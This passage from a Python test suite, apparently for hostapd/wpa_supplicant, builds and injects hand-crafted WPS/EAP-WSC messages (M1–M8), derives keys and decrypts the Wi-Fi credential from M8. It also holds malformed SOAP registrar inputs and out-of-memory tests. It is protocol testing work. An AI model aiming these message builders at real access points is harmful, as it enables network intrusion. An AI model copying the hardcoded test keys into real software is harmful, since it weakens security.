"1049002c00372a0001200124111111111111222222222222333333333333444444444444555555555555666666666666" +
"10480010362db47ba53a519188fb5458b986b2e4"),
(200, "104a000110" + "1041000100" + "101200020000" +
"105300020000"),
(200, "104a000110" + "1041000100"),
(200, "104a000110") ]
for status,test in tests:
tlvs = binascii.unhexlify(test)
newmsg = base64.b64encode(tlvs).decode()
msg = '<?xml version="1.0"?>\n'
msg += '<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">'
msg += '<s:Body>'
msg += '<u:SetSelectedRegistrar xmlns:u="urn:schemas-wifialliance-org:service:WFAWLANConfig:1">'
msg += '<NewMessage>'
msg += newmsg
msg += "</NewMessage></u:SetSelectedRegistrar></s:Body></s:Envelope>"
headers = { "Content-type": 'text/xml; charset="utf-8"' }
headers["SOAPAction"] = '"urn:schemas-wifialliance-org:service:WFAWLANConfig:1#%s"' % "SetSelectedRegistrar"
conn.request("POST", ctrlurl.path, msg, headers)
resp = conn.getresponse()
if resp.status != status:
raise Exception("Unexpected HTTP response: %d (expected %d)" % (resp.status, status))
def test_ap_wps_adv_oom(dev, apdev):
"""WPS AP and advertisement OOM"""
ap_uuid = "27ea801a-9e5c-4e73-bd82-f89cbcd10d7e"
hapd = add_ssdp_ap(apdev[0], ap_uuid)
with alloc_fail(hapd, 1, "=msearchreply_state_machine_start"):
ssdp_send_msearch("urn:schemas-wifialliance-org:service:WFAWLANConfig:1",
no_recv=True)
time.sleep(0.2)
with alloc_fail(hapd, 1, "eloop_register_timeout;msearchreply_state_machine_start"):
ssdp_send_msearch("urn:schemas-wifialliance-org:service:WFAWLANConfig:1",
no_recv=True)
time.sleep(0.2)
with alloc_fail(hapd, 1,
"next_advertisement;advertisement_state_machine_stop"):
hapd.disable()
with alloc_fail(hapd, 1, "ssdp_listener_start"):
if "FAIL" not in hapd.request("ENABLE"):
raise Exception("ENABLE succeeded during OOM")
def test_wps_config_methods(dev):
"""WPS config method update"""
wpas = WpaSupplicant(global_iface='/tmp/wpas-wlan5')
wpas.interface_add("wlan5")
if "OK" not in wpas.request("SET config_methods display label"):
raise Exception("Failed to set config_methods")
if wpas.request("GET config_methods").strip() != "display label":
raise Exception("config_methods were not updated")
if "OK" not in wpas.request("SET config_methods "):
raise Exception("Failed to clear config_methods")
if wpas.request("GET config_methods").strip() != "":
raise Exception("config_methods were not cleared")
WPS_VENDOR_ID_WFA = 14122
WPS_VENDOR_TYPE = 1
# EAP-WSC Op-Code values
WSC_Start = 0x01
WSC_ACK = 0x02
WSC_NACK = 0x03
WSC_MSG = 0x04
WSC_Done = 0x05
WSC_FRAG_ACK = 0x06
ATTR_AP_CHANNEL = 0x1001
ATTR_ASSOC_STATE = 0x1002
ATTR_AUTH_TYPE = 0x1003
ATTR_AUTH_TYPE_FLAGS = 0x1004
ATTR_AUTHENTICATOR = 0x1005
ATTR_CONFIG_METHODS = 0x1008
ATTR_CONFIG_ERROR = 0x1009
ATTR_CONFIRM_URL4 = 0x100a
ATTR_CONFIRM_URL6 = 0x100b
ATTR_CONN_TYPE = 0x100c
ATTR_CONN_TYPE_FLAGS = 0x100d
ATTR_CRED = 0x100e
ATTR_ENCR_TYPE = 0x100f
ATTR_ENCR_TYPE_FLAGS = 0x1010
ATTR_DEV_NAME = 0x1011
ATTR_DEV_PASSWORD_ID = 0x1012
ATTR_E_HASH1 = 0x1014
ATTR_E_HASH2 = 0x1015
ATTR_E_SNONCE1 = 0x1016
ATTR_E_SNONCE2 = 0x1017
ATTR_ENCR_SETTINGS = 0x1018
ATTR_ENROLLEE_NONCE = 0x101a
ATTR_FEATURE_ID = 0x101b
ATTR_IDENTITY = 0x101c
ATTR_IDENTITY_PROOF = 0x101d
ATTR_KEY_WRAP_AUTH = 0x101e
ATTR_KEY_ID = 0x101f
ATTR_MAC_ADDR = 0x1020
ATTR_MANUFACTURER = 0x1021
ATTR_MSG_TYPE = 0x1022
ATTR_MODEL_NAME = 0x1023
ATTR_MODEL_NUMBER = 0x1024
ATTR_NETWORK_INDEX = 0x1026
ATTR_NETWORK_KEY = 0x1027
ATTR_NETWORK_KEY_INDEX = 0x1028
ATTR_NEW_DEVICE_NAME = 0x1029
ATTR_NEW_PASSWORD = 0x102a
ATTR_OOB_DEVICE_PASSWORD = 0x102c
ATTR_OS_VERSION = 0x102d
ATTR_POWER_LEVEL = 0x102f
ATTR_PSK_CURRENT = 0x1030
ATTR_PSK_MAX = 0x1031
ATTR_PUBLIC_KEY = 0x1032
ATTR_RADIO_ENABLE = 0x1033
ATTR_REBOOT = 0x1034
ATTR_REGISTRAR_CURRENT = 0x1035
ATTR_REGISTRAR_ESTABLISHED = 0x1036
ATTR_REGISTRAR_LIST = 0x1037
ATTR_REGISTRAR_MAX = 0x1038
ATTR_REGISTRAR_NONCE = 0x1039
ATTR_REQUEST_TYPE = 0x103a
ATTR_RESPONSE_TYPE = 0x103b
ATTR_RF_BANDS = 0x103c
ATTR_R_HASH1 = 0x103d
ATTR_R_HASH2 = 0x103e
ATTR_R_SNONCE1 = 0x103f
ATTR_R_SNONCE2 = 0x1040
ATTR_SELECTED_REGISTRAR = 0x1041
ATTR_SERIAL_NUMBER = 0x1042
ATTR_WPS_STATE = 0x1044
ATTR_SSID = 0x1045
ATTR_TOTAL_NETWORKS = 0x1046
ATTR_UUID_E = 0x1047
ATTR_UUID_R = 0x1048
ATTR_VENDOR_EXT = 0x1049
ATTR_VERSION = 0x104a
ATTR_X509_CERT_REQ = 0x104b
ATTR_X509_CERT = 0x104c
ATTR_EAP_IDENTITY = 0x104d
ATTR_MSG_COUNTER = 0x104e
ATTR_PUBKEY_HASH = 0x104f
ATTR_REKEY_KEY = 0x1050
ATTR_KEY_LIFETIME = 0x1051
ATTR_PERMITTED_CFG_METHODS = 0x1052
ATTR_SELECTED_REGISTRAR_CONFIG_METHODS = 0x1053
ATTR_PRIMARY_DEV_TYPE = 0x1054
ATTR_SECONDARY_DEV_TYPE_LIST = 0x1055
ATTR_PORTABLE_DEV = 0x1056
ATTR_AP_SETUP_LOCKED = 0x1057
ATTR_APPLICATION_EXT = 0x1058
ATTR_EAP_TYPE = 0x1059
ATTR_IV = 0x1060
ATTR_KEY_PROVIDED_AUTO = 0x1061
ATTR_802_1X_ENABLED = 0x1062
ATTR_APPSESSIONKEY = 0x1063
ATTR_WEPTRANSMITKEY = 0x1064
ATTR_REQUESTED_DEV_TYPE = 0x106a
# Message Type
WPS_Beacon = 0x01
WPS_ProbeRequest = 0x02
WPS_ProbeResponse = 0x03
WPS_M1 = 0x04
WPS_M2 = 0x05
WPS_M2D = 0x06
WPS_M3 = 0x07
WPS_M4 = 0x08
WPS_M5 = 0x09
WPS_M6 = 0x0a
WPS_M7 = 0x0b
WPS_M8 = 0x0c
WPS_WSC_ACK = 0x0d
WPS_WSC_NACK = 0x0e
WPS_WSC_DONE = 0x0f
def get_wsc_msg(dev):
ev = dev.wait_event(["EAPOL-TX"], timeout=10)
if ev is None:
raise Exception("Timeout on EAPOL-TX")
data = binascii.unhexlify(ev.split(' ')[2])
msg = {}
# Parse EAPOL header
if len(data) < 4:
raise Exception("No room for EAPOL header")
version,type,length = struct.unpack('>BBH', data[0:4])
msg['eapol_version'] = version
msg['eapol_type'] = type
msg['eapol_length'] = length
data = data[4:]
if length != len(data):
raise Exception("EAPOL header length mismatch (%d != %d)" % (length, len(data)))
if type != 0:
raise Exception("Unexpected EAPOL header type: %d" % type)
# Parse EAP header
if len(data) < 4:
raise Exception("No room for EAP header")
code,identifier,length = struct.unpack('>BBH', data[0:4])
msg['eap_code'] = code
msg['eap_identifier'] = identifier
msg['eap_length'] = length
data = data[4:]
if msg['eapol_length'] != msg['eap_length']:
raise Exception("EAP header length mismatch (%d != %d)" % (msg['eapol_length'], length))
# Parse EAP expanded header
if len(data) < 1:
raise Exception("No EAP type included")
msg['eap_type'], = struct.unpack('B', data[0:1])
data = data[1:]
if msg['eap_type'] == 254:
if len(data) < 3 + 4:
raise Exception("Truncated EAP expanded header")
msg['eap_vendor_id'], msg['eap_vendor_type'] = struct.unpack('>LL', b'\x00' + data[0:7])
data = data[7:]
else:
raise Exception("Unexpected EAP type")
if msg['eap_vendor_id'] != WPS_VENDOR_ID_WFA:
raise Exception("Unexpected Vendor-Id")
if msg['eap_vendor_type'] != WPS_VENDOR_TYPE:
raise Exception("Unexpected Vendor-Type")
# Parse EAP-WSC header
if len(data) < 2:
raise Exception("Truncated EAP-WSC header")
msg['wsc_opcode'], msg['wsc_flags'] = struct.unpack('BB', data[0:2])
data = data[2:]
# Parse WSC attributes
msg['raw_attrs'] = data
attrs = {}
while len(data) > 0:
if len(data) < 4:
raise Exception("Truncated attribute header")
attr,length = struct.unpack('>HH', data[0:4])
data = data[4:]
if length > len(data):
raise Exception("Truncated attribute 0x%04x" % attr)
attrs[attr] = data[0:length]
data = data[length:]
msg['wsc_attrs'] = attrs
if ATTR_MSG_TYPE in attrs:
msg['wsc_msg_type'], = struct.unpack('B', attrs[ATTR_MSG_TYPE])
return msg
def recv_wsc_msg(dev, opcode, msg_type):
msg = get_wsc_msg(dev)
if msg['wsc_opcode'] != opcode or msg['wsc_msg_type'] != msg_type:
raise Exception("Unexpected Op-Code/MsgType")
return msg, msg['wsc_attrs'], msg['raw_attrs']
def build_wsc_attr(attr, payload):
_payload = payload if type(payload) == bytes else payload.encode()
return struct.pack('>HH', attr, len(_payload)) + _payload
def build_attr_msg_type(msg_type):
return build_wsc_attr(ATTR_MSG_TYPE, struct.pack('B', msg_type))
def build_eap_wsc(eap_code, eap_id, payload, opcode=WSC_MSG):
length = 4 + 8 + 2 + len(payload)
# EAPOL header
msg = struct.pack('>BBH', 2, 0, length)
# EAP header
msg += struct.pack('>BBH', eap_code, eap_id, length)
# EAP expanded header for EAP-WSC
msg += struct.pack('B', 254)
msg += struct.pack('>L', WPS_VENDOR_ID_WFA)[1:4]
msg += struct.pack('>L', WPS_VENDOR_TYPE)
# EAP-WSC header
msg += struct.pack('BB', opcode, 0)
# WSC attributes
msg += payload
return msg
def build_eap_success(eap_id):
length = 4
# EAPOL header
msg = struct.pack('>BBH', 2, 0, length)
# EAP header
msg += struct.pack('>BBH', 3, eap_id, length)
return msg
def build_eap_failure(eap_id):
length = 4
# EAPOL header
msg = struct.pack('>BBH', 2, 0, length)
# EAP header
msg += struct.pack('>BBH', 4, eap_id, length)
return msg
def send_wsc_msg(dev, src, msg):
res = dev.request("EAPOL_RX " + src + " " + binascii.hexlify(msg).decode())
if "OK" not in res:
raise Exception("EAPOL_RX failed")
group_5_prime = 0xFFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD129024E088A67CC74020BBEA63B139B22514A08798E3404DDEF9519B3CD3A431B302B0A6DF25F14374FE1356D6D51C245E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7EDEE386BFB5A899FA5AE9F24117C4B1FE649286651ECE45B3DC2007CB8A163BF0598DA48361C55D39A69163FA8FD24CF5F83655D23DCA3AD961C62F356208552BB9ED529077096966D670C354E4ABC9804F1746C08CA237327FFFFFFFFFFFFFFFF
group_5_generator = 2
def wsc_kdf(key, label, bits):
result = b''
i = 1
while len(result) * 8 < bits:
data = struct.pack('>L', i) + label.encode() + struct.pack('>L', bits)
m = hmac.new(key, data, hashlib.sha256)
result += m.digest()
i += 1
return result[0:bits // 8]
def wsc_keys(kdk):
keys = wsc_kdf(kdk, "Wi-Fi Easy and Secure Key Derivation", 640)
authkey = keys[0:32]
keywrapkey = keys[32:48]
emsk = keys[48:80]
return authkey,keywrapkey,emsk
def wsc_dev_pw_half_psk(authkey, dev_pw):
m = hmac.new(authkey, dev_pw.encode(), hashlib.sha256)
return m.digest()[0:16]
def wsc_dev_pw_psk(authkey, dev_pw):
dev_pw_1 = dev_pw[0:len(dev_pw) // 2]
dev_pw_2 = dev_pw[len(dev_pw) // 2:]
psk1 = wsc_dev_pw_half_psk(authkey, dev_pw_1)
psk2 = wsc_dev_pw_half_psk(authkey, dev_pw_2)
return psk1,psk2
def build_attr_authenticator(authkey, prev_msg, curr_msg):
m = hmac.new(authkey, prev_msg + curr_msg, hashlib.sha256)
auth = m.digest()[0:8]
return build_wsc_attr(ATTR_AUTHENTICATOR, auth)
def build_attr_encr_settings(authkey, keywrapkey, data):
m = hmac.new(authkey, data, hashlib.sha256)
kwa = m.digest()[0:8]
data += build_wsc_attr(ATTR_KEY_WRAP_AUTH, kwa)
iv = 16*b'\x99'
aes = AES.new(keywrapkey, AES.MODE_CBC, iv)
pad_len = 16 - len(data) % 16
ps = pad_len * struct.pack('B', pad_len)
data += ps
wrapped = aes.encrypt(data)
return build_wsc_attr(ATTR_ENCR_SETTINGS, iv + wrapped)
def decrypt_attr_encr_settings(authkey, keywrapkey, data):
if len(data) < 32 or len(data) % 16 != 0:
raise Exception("Unexpected Encrypted Settings length: %d" % len(data))
iv = data[0:16]
encr = data[16:]
aes = AES.new(keywrapkey, AES.MODE_CBC, iv)
decrypted = aes.decrypt(encr)
pad_len, = struct.unpack('B', decrypted[-1:])
if pad_len > len(decrypted):
raise Exception("Invalid padding in Encrypted Settings")
for i in range(-pad_len, -1):
if decrypted[i] != decrypted[-1]:
raise Exception("Invalid PS value in Encrypted Settings")
decrypted = decrypted[0:len(decrypted) - pad_len]
if len(decrypted) < 12:
raise Exception("Truncated Encrypted Settings plaintext")
kwa = decrypted[-12:]
attr,length = struct.unpack(">HH", kwa[0:4])
if attr != ATTR_KEY_WRAP_AUTH or length != 8:
raise Exception("Invalid KWA header")
kwa = kwa[4:]
decrypted = decrypted[0:len(decrypted) - 12]
m = hmac.new(authkey, decrypted, hashlib.sha256)
calc_kwa = m.digest()[0:8]
if kwa != calc_kwa:
raise Exception("KWA mismatch")
return decrypted
def zeropad_str(val, pad_len):
while len(val) < pad_len * 2:
val = '0' + val
return val
def wsc_dh_init():
# For now, use a hardcoded private key. In theory, this is supposed to be
# randomly selected.
own_private = 0x123456789
own_public = pow(group_5_generator, own_private, group_5_prime)
pk = binascii.unhexlify(zeropad_str(format(own_public, '02x'), 192))
return own_private, pk
def wsc_dh_kdf(peer_pk, own_private, mac_addr, e_nonce, r_nonce):
peer_public = int(binascii.hexlify(peer_pk), 16)
if peer_public < 2 or peer_public >= group_5_prime:
raise Exception("Invalid peer public key")
if pow(peer_public, (group_5_prime - 1) // 2, group_5_prime) != 1:
raise Exception("Unexpected Legendre symbol for peer public key")
shared_secret = pow(peer_public, own_private, group_5_prime)
ss = zeropad_str(format(shared_secret, "02x"), 192)
logger.debug("DH shared secret: " + ss)
dhkey = hashlib.sha256(binascii.unhexlify(ss)).digest()
logger.debug("DHKey: " + binascii.hexlify(dhkey).decode())
m = hmac.new(dhkey, e_nonce + mac_addr + r_nonce, hashlib.sha256)
kdk = m.digest()
logger.debug("KDK: " + binascii.hexlify(kdk).decode())
authkey,keywrapkey,emsk = wsc_keys(kdk)
logger.debug("AuthKey: " + binascii.hexlify(authkey).decode())
logger.debug("KeyWrapKey: " + binascii.hexlify(keywrapkey).decode())
logger.debug("EMSK: " + binascii.hexlify(emsk).decode())
return authkey,keywrapkey
def wsc_dev_pw_hash(authkey, dev_pw, e_pk, r_pk):
psk1,psk2 = wsc_dev_pw_psk(authkey, dev_pw)
logger.debug("PSK1: " + binascii.hexlify(psk1).decode())
logger.debug("PSK2: " + binascii.hexlify(psk2).decode())
# Note: Secret values are supposed to be random, but hardcoded values are
# fine for testing.
s1 = 16*b'\x77'
m = hmac.new(authkey, s1 + psk1 + e_pk + r_pk, hashlib.sha256)
hash1 = m.digest()
logger.debug("Hash1: " + binascii.hexlify(hash1).decode())
s2 = 16*b'\x88'
m = hmac.new(authkey, s2 + psk2 + e_pk + r_pk, hashlib.sha256)
hash2 = m.digest()
logger.debug("Hash2: " + binascii.hexlify(hash2).decode())
return s1,s2,hash1,hash2
def build_m1(eap_id, uuid_e, mac_addr, e_nonce, e_pk,
manufacturer='', model_name='', config_methods='\x00\x00'):
attrs = build_wsc_attr(ATTR_VERSION, '\x10')
attrs += build_attr_msg_type(WPS_M1)
attrs += build_wsc_attr(ATTR_UUID_E, uuid_e)
attrs += build_wsc_attr(ATTR_MAC_ADDR, mac_addr)
attrs += build_wsc_attr(ATTR_ENROLLEE_NONCE, e_nonce)
attrs += build_wsc_attr(ATTR_PUBLIC_KEY, e_pk)
attrs += build_wsc_attr(ATTR_AUTH_TYPE_FLAGS, '\x00\x00')
attrs += build_wsc_attr(ATTR_ENCR_TYPE_FLAGS, '\x00\x00')
attrs += build_wsc_attr(ATTR_CONN_TYPE_FLAGS, '\x00')
attrs += build_wsc_attr(ATTR_CONFIG_METHODS, config_methods)
attrs += build_wsc_attr(ATTR_WPS_STATE, '\x00')
attrs += build_wsc_attr(ATTR_MANUFACTURER, manufacturer)
attrs += build_wsc_attr(ATTR_MODEL_NAME, model_name)
attrs += build_wsc_attr(ATTR_MODEL_NUMBER, '')
attrs += build_wsc_attr(ATTR_SERIAL_NUMBER, '')
attrs += build_wsc_attr(ATTR_PRIMARY_DEV_TYPE, 8*'\x00')
attrs += build_wsc_attr(ATTR_DEV_NAME, '')
attrs += build_wsc_attr(ATTR_RF_BANDS, '\x00')
attrs += build_wsc_attr(ATTR_ASSOC_STATE, '\x00\x00')
attrs += build_wsc_attr(ATTR_DEV_PASSWORD_ID, '\x00\x00')
attrs += build_wsc_attr(ATTR_CONFIG_ERROR, '\x00\x00')
attrs += build_wsc_attr(ATTR_OS_VERSION, '\x00\x00\x00\x00')
m1 = build_eap_wsc(2, eap_id, attrs)
return m1, attrs
def build_m2(authkey, m1, eap_id, e_nonce, r_nonce, uuid_r, r_pk,
dev_pw_id='\x00\x00', eap_code=1):
attrs = build_wsc_attr(ATTR_VERSION, '\x10')
attrs += build_attr_msg_type(WPS_M2)
if e_nonce:
attrs += build_wsc_attr(ATTR_ENROLLEE_NONCE, e_nonce)
if r_nonce:
attrs += build_wsc_attr(ATTR_REGISTRAR_NONCE, r_nonce)
attrs += build_wsc_attr(ATTR_UUID_R, uuid_r)
if r_pk:
attrs += build_wsc_attr(ATTR_PUBLIC_KEY, r_pk)
attrs += build_wsc_attr(ATTR_AUTH_TYPE_FLAGS, '\x00\x00')
attrs += build_wsc_attr(ATTR_ENCR_TYPE_FLAGS, '\x00\x00')
attrs += build_wsc_attr(ATTR_CONN_TYPE_FLAGS, '\x00')
attrs += build_wsc_attr(ATTR_CONFIG_METHODS, '\x00\x00')
attrs += build_wsc_attr(ATTR_MANUFACTURER, '')
attrs += build_wsc_attr(ATTR_MODEL_NAME, '')
attrs += build_wsc_attr(ATTR_MODEL_NUMBER, '')
attrs += build_wsc_attr(ATTR_SERIAL_NUMBER, '')
attrs += build_wsc_attr(ATTR_PRIMARY_DEV_TYPE, 8*'\x00')
attrs += build_wsc_attr(ATTR_DEV_NAME, '')
attrs += build_wsc_attr(ATTR_RF_BANDS, '\x00')
attrs += build_wsc_attr(ATTR_ASSOC_STATE, '\x00\x00')
attrs += build_wsc_attr(ATTR_CONFIG_ERROR, '\x00\x00')
attrs += build_wsc_attr(ATTR_DEV_PASSWORD_ID, dev_pw_id)
attrs += build_wsc_attr(ATTR_OS_VERSION, '\x00\x00\x00\x00')
attrs += build_attr_authenticator(authkey, m1, attrs)
m2 = build_eap_wsc(eap_code, eap_id, attrs)
return m2, attrs
def build_m2d(m1, eap_id, e_nonce, r_nonce, uuid_r, dev_pw_id=None, eap_code=1):
attrs = build_wsc_attr(ATTR_VERSION, '\x10')
attrs += build_attr_msg_type(WPS_M2D)
attrs += build_wsc_attr(ATTR_ENROLLEE_NONCE, e_nonce)
attrs += build_wsc_attr(ATTR_REGISTRAR_NONCE, r_nonce)
attrs += build_wsc_attr(ATTR_UUID_R, uuid_r)
attrs += build_wsc_attr(ATTR_AUTH_TYPE_FLAGS, '\x00\x00')
attrs += build_wsc_attr(ATTR_ENCR_TYPE_FLAGS, '\x00\x00')
attrs += build_wsc_attr(ATTR_CONN_TYPE_FLAGS, '\x00')
attrs += build_wsc_attr(ATTR_CONFIG_METHODS, '\x00\x00')
attrs += build_wsc_attr(ATTR_MANUFACTURER, '')
attrs += build_wsc_attr(ATTR_MODEL_NAME, '')
#attrs += build_wsc_attr(ATTR_MODEL_NUMBER, '')
attrs += build_wsc_attr(ATTR_SERIAL_NUMBER, '')
attrs += build_wsc_attr(ATTR_PRIMARY_DEV_TYPE, 8*'\x00')
attrs += build_wsc_attr(ATTR_DEV_NAME, '')
attrs += build_wsc_attr(ATTR_RF_BANDS, '\x00')
attrs += build_wsc_attr(ATTR_ASSOC_STATE, '\x00\x00')
attrs += build_wsc_attr(ATTR_CONFIG_ERROR, '\x00\x00')
attrs += build_wsc_attr(ATTR_OS_VERSION, '\x00\x00\x00\x00')
if dev_pw_id:
attrs += build_wsc_attr(ATTR_DEV_PASSWORD_ID, dev_pw_id)
m2d = build_eap_wsc(eap_code, eap_id, attrs)
return m2d, attrs
def build_ack(eap_id, e_nonce, r_nonce, msg_type=WPS_WSC_ACK, eap_code=1):
attrs = build_wsc_attr(ATTR_VERSION, '\x10')
if msg_type is not None:
attrs += build_attr_msg_type(msg_type)
if e_nonce:
attrs += build_wsc_attr(ATTR_ENROLLEE_NONCE, e_nonce)
if r_nonce:
attrs += build_wsc_attr(ATTR_REGISTRAR_NONCE, r_nonce)
msg = build_eap_wsc(eap_code, eap_id, attrs, opcode=WSC_ACK)
return msg, attrs
def build_nack(eap_id, e_nonce, r_nonce, config_error='\x00\x00',
msg_type=WPS_WSC_NACK, eap_code=1):
attrs = build_wsc_attr(ATTR_VERSION, '\x10')
if msg_type is not None:
attrs += build_attr_msg_type(msg_type)
if e_nonce:
attrs += build_wsc_attr(ATTR_ENROLLEE_NONCE, e_nonce)
if r_nonce:
attrs += build_wsc_attr(ATTR_REGISTRAR_NONCE, r_nonce)
if config_error:
attrs += build_wsc_attr(ATTR_CONFIG_ERROR, config_error)
msg = build_eap_wsc(eap_code, eap_id, attrs, opcode=WSC_NACK)
return msg, attrs
def test_wps_ext(dev, apdev):
"""WPS against external implementation"""
pin = "12345670"
addr,bssid,hapd = wps_start_ext(apdev[0], dev[0], pin=pin)
wps_ext_eap_identity_req(dev[0], hapd, bssid)
wps_ext_eap_identity_resp(hapd, dev[0], addr)
logger.debug("Receive WSC/Start from AP")
msg = get_wsc_msg(hapd)
if msg['wsc_opcode'] != WSC_Start:
raise Exception("Unexpected Op-Code for WSC/Start")
wsc_start_id = msg['eap_identifier']
mac_addr = binascii.unhexlify(dev[0].own_addr().replace(':', ''))
uuid_e = 16*b'\x11'
e_nonce = 16*b'\x22'
own_private, e_pk = wsc_dh_init()
logger.debug("Send M1 to AP")
m1, raw_m1_attrs = build_m1(msg['eap_identifier'], uuid_e, mac_addr,
e_nonce, e_pk)
send_wsc_msg(hapd, addr, m1)
logger.debug("Receive M2 from AP")
msg, m2_attrs, raw_m2_attrs = recv_wsc_msg(hapd, WSC_MSG, WPS_M2)
authkey,keywrapkey = wsc_dh_kdf(m2_attrs[ATTR_PUBLIC_KEY], own_private,
mac_addr, e_nonce,
m2_attrs[ATTR_REGISTRAR_NONCE])
e_s1,e_s2,e_hash1,e_hash2 = wsc_dev_pw_hash(authkey, pin, e_pk,
m2_attrs[ATTR_PUBLIC_KEY])
logger.debug("Send M3 to AP")
attrs = build_wsc_attr(ATTR_VERSION, '\x10')
attrs += build_attr_msg_type(WPS_M3)
attrs += build_wsc_attr(ATTR_REGISTRAR_NONCE,
m2_attrs[ATTR_REGISTRAR_NONCE])
attrs += build_wsc_attr(ATTR_E_HASH1, e_hash1)
attrs += build_wsc_attr(ATTR_E_HASH2, e_hash2)
attrs += build_attr_authenticator(authkey, raw_m2_attrs, attrs)
raw_m3_attrs = attrs
m3 = build_eap_wsc(2, msg['eap_identifier'], attrs)
send_wsc_msg(hapd, addr, m3)
logger.debug("Receive M4 from AP")
msg, m4_attrs, raw_m4_attrs = recv_wsc_msg(hapd, WSC_MSG, WPS_M4)
logger.debug("Send M5 to AP")
attrs = build_wsc_attr(ATTR_VERSION, '\x10')
attrs += build_attr_msg_type(WPS_M5)
attrs += build_wsc_attr(ATTR_REGISTRAR_NONCE,
m2_attrs[ATTR_REGISTRAR_NONCE])
data = build_wsc_attr(ATTR_E_SNONCE1, e_s1)
attrs += build_attr_encr_settings(authkey, keywrapkey, data)
attrs += build_attr_authenticator(authkey, raw_m4_attrs, attrs)
raw_m5_attrs = attrs
m5 = build_eap_wsc(2, msg['eap_identifier'], attrs)
send_wsc_msg(hapd, addr, m5)
logger.debug("Receive M6 from AP")
msg, m6_attrs, raw_m6_attrs = recv_wsc_msg(hapd, WSC_MSG, WPS_M6)
logger.debug("Send M7 to AP")
attrs = build_wsc_attr(ATTR_VERSION, '\x10')
attrs += build_attr_msg_type(WPS_M7)
attrs += build_wsc_attr(ATTR_REGISTRAR_NONCE,
m2_attrs[ATTR_REGISTRAR_NONCE])
data = build_wsc_attr(ATTR_E_SNONCE2, e_s2)
attrs += build_attr_encr_settings(authkey, keywrapkey, data)
attrs += build_attr_authenticator(authkey, raw_m6_attrs, attrs)
m7 = build_eap_wsc(2, msg['eap_identifier'], attrs)
raw_m7_attrs = attrs
send_wsc_msg(hapd, addr, m7)
logger.debug("Receive M8 from AP")
msg, m8_attrs, raw_m8_attrs = recv_wsc_msg(hapd, WSC_MSG, WPS_M8)
m8_cred = decrypt_attr_encr_settings(authkey, keywrapkey,
m8_attrs[ATTR_ENCR_SETTINGS])
logger.debug("M8 Credential: " + binascii.hexlify(m8_cred).decode())
logger.debug("Prepare WSC_Done")
attrs = build_wsc_attr(ATTR_VERSION, '\x10')
attrs += build_attr_msg_type(WPS_WSC_DONE)
attrs += build_wsc_attr(ATTR_ENROLLEE_NONCE, e_nonce)
attrs += build_wsc_attr(ATTR_REGISTRAR_NONCE,
m2_attrs[ATTR_REGISTRAR_NONCE])
wsc_done = build_eap_wsc(2, msg['eap_identifier'], attrs, opcode=WSC_Done)
# Do not send WSC_Done yet to allow exchangw with STA complete before the
# AP disconnects.
uuid_r = 16*b'\x33'
r_nonce = 16*b'\x44'
eap_id = wsc_start_id
logger.debug("Send WSC/Start to STA")
wsc_start = build_eap_wsc(1, eap_id, b'', opcode=WSC_Start)
send_wsc_msg(dev[0], bssid, wsc_start)
eap_id = (eap_id + 1) % 256
logger.debug("Receive M1 from STA")
msg, m1_attrs, raw_m1_attrs = recv_wsc_msg(dev[0], WSC_MSG, WPS_M1)
authkey,keywrapkey = wsc_dh_kdf(m1_attrs[ATTR_PUBLIC_KEY], own_private,
mac_addr, m1_attrs[ATTR_ENROLLEE_NONCE],
r_nonce)
r_s1,r_s2,r_hash1,r_hash2 = wsc_dev_pw_hash(authkey, pin,
m1_attrs[ATTR_PUBLIC_KEY], e_pk)
logger.debug("Send M2 to STA")
m2, raw_m2_attrs = build_m2(authkey, raw_m1_attrs, eap_id,
m1_attrs[ATTR_ENROLLEE_NONCE],
r_nonce, uuid_r, e_pk)
send_wsc_msg(dev[0], bssid, m2)
eap_id = (eap_id + 1) % 256
logger.debug("Receive M3 from STA")
msg, m3_attrs, raw_m3_attrs = recv_wsc_msg(dev[0], WSC_MSG, WPS_M3)
logger.debug("Send M4 to STA")
attrs = build_wsc_attr(ATTR_VERSION, '\x10')
attrs += build_attr_msg_type(WPS_M4)
attrs += build_wsc_attr(ATTR_ENROLLEE_NONCE, m1_attrs[ATTR_ENROLLEE_NONCE])
attrs += build_wsc_attr(ATTR_R_HASH1, r_hash1)
attrs += build_wsc_attr(ATTR_R_HASH2, r_hash2)
data = build_wsc_attr(ATTR_R_SNONCE1, r_s1)
attrs += build_attr_encr_settings(authkey, keywrapkey, data)
attrs += build_attr_authenticator(authkey, raw_m3_attrs, attrs)
raw_m4_attrs = attrs
m4 = build_eap_wsc(1, eap_id, attrs)
send_wsc_msg(dev[0], bssid, m4)
eap_id = (eap_id + 1) % 256
logger.debug("Receive M5 from STA")
msg, m5_attrs, raw_m5_attrs = recv_wsc_msg(dev[0], WSC_MSG, WPS_M5)
logger.debug("Send M6 to STA")
attrs = build_wsc_attr(ATTR_VERSION, '\x10')
attrs += build_attr_msg_type(WPS_M6)
attrs += build_wsc_attr(ATTR_ENROLLEE_NONCE,
m1_attrs[ATTR_ENROLLEE_NONCE])
data = build_wsc_attr(ATTR_R_SNONCE2, r_s2)
attrs += build_attr_encr_settings(authkey, keywrapkey, data)
attrs += build_attr_authenticator(authkey, raw_m5_attrs, attrs)
raw_m6_attrs = attrs
m6 = build_eap_wsc(1, eap_id, attrs)
send_wsc_msg(dev[0], bssid, m6)
eap_id = (eap_id + 1) % 256
logger.debug("Receive M7 from STA")
msg, m7_attrs, raw_m7_attrs = recv_wsc_msg(dev[0], WSC_MSG, WPS_M7)
logger.debug("Send M8 to STA")
attrs = build_wsc_attr(ATTR_VERSION, '\x10')
attrs += build_attr_msg_type(WPS_M8)
attrs += build_wsc_attr(ATTR_ENROLLEE_NONCE,
m1_attrs[ATTR_ENROLLEE_NONCE])
attrs += build_attr_encr_settings(authkey, keywrapkey, m8_cred)
attrs += build_attr_authenticator(authkey, raw_m7_attrs, attrs)
raw_m8_attrs = attrs
m8 = build_eap_wsc(1, eap_id, attrs)
send_wsc_msg(dev[0], bssid, m8)
eap_id = (eap_id + 1) % 256
ev = dev[0].wait_event(["WPS-CRED-RECEIVED"], timeout=5)
if ev is None:
raise Exception("wpa_supplicant did not report credential")
logger.debug("Receive WSC_Done from STA")
msg = get_wsc_msg(dev[0])
if msg['wsc_opcode'] != WSC_Done or msg['wsc_msg_type'] != WPS_WSC_DONE:
raise Exception("Unexpected Op-Code/MsgType for WSC_Done")
